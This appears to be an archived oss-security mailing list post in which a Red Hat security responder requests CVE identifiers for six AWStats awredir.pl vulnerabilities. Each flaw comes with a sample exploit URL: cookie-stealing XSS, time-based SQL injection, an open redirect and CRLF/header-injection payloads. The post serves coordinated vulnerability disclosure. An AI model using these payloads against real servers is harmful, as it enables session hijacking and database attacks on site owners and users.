Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 07 Oct 2011 10:17:15 +0200
From: Jan Lieskovsky <jlieskov@...hat.com>
To: "Steven M. Christey" <coley@...us.mitre.org>
CC: oss-security@...ts.openwall.com, MustLive <mustlive@...security.com.ua>
Subject: CVE Request -- Multiple security issues in various versions of AWStats

Hello Josh, Steve, vendors,

   these doesn't look like CVE ids have been already assigned for:
   [1] https://bugzilla.redhat.com/show_bug.cgi?id=740926#c0
   [2] http://secunia.com/advisories/46160/
   [3] http://seclists.org/fulldisclosure/2011/Sep/234
   [4] http://websecurity.com.ua/5380/

If I counted correctly, six CVE ids should be assigned for these
(since different versions are listed as vulnerable):

1) XSS (WASC-08) (in versions <=1.1):
    http://site/awredir.pl?url=javascript:alert(document.cookie)

2) Redirector (URL Redirector Abuse in WASC 2.0) (WASC-38):
    http://site/awredir.pl?url=http://websecurity.com.ua

3) SQL Injection (WASC-19): (version 1.2)
    http://site/awredir.pl?url='%20and%20benchmark(10000,md5(now()))/*

4) XSS (WASC-08) (in version 1.2):

    http://site/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C
    /script%3E

    http://site/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C
    /script%3E

5) HTTP Response Splitting (WASC-25):

    http://site/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857&
    url=%0AHeader:1

6) CRLF Injection (Improper Input Handling in WASC 2.0) (WASC-20):

    http://site/awredir.pl?key=4b9faa91e2529400c4f3c70833b4e4a5&
    url=%0AText

Could you allocate CVE identifiers for these? (let me know
if further description of each of the issues is necessary prior
assignment).

Thank you && Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ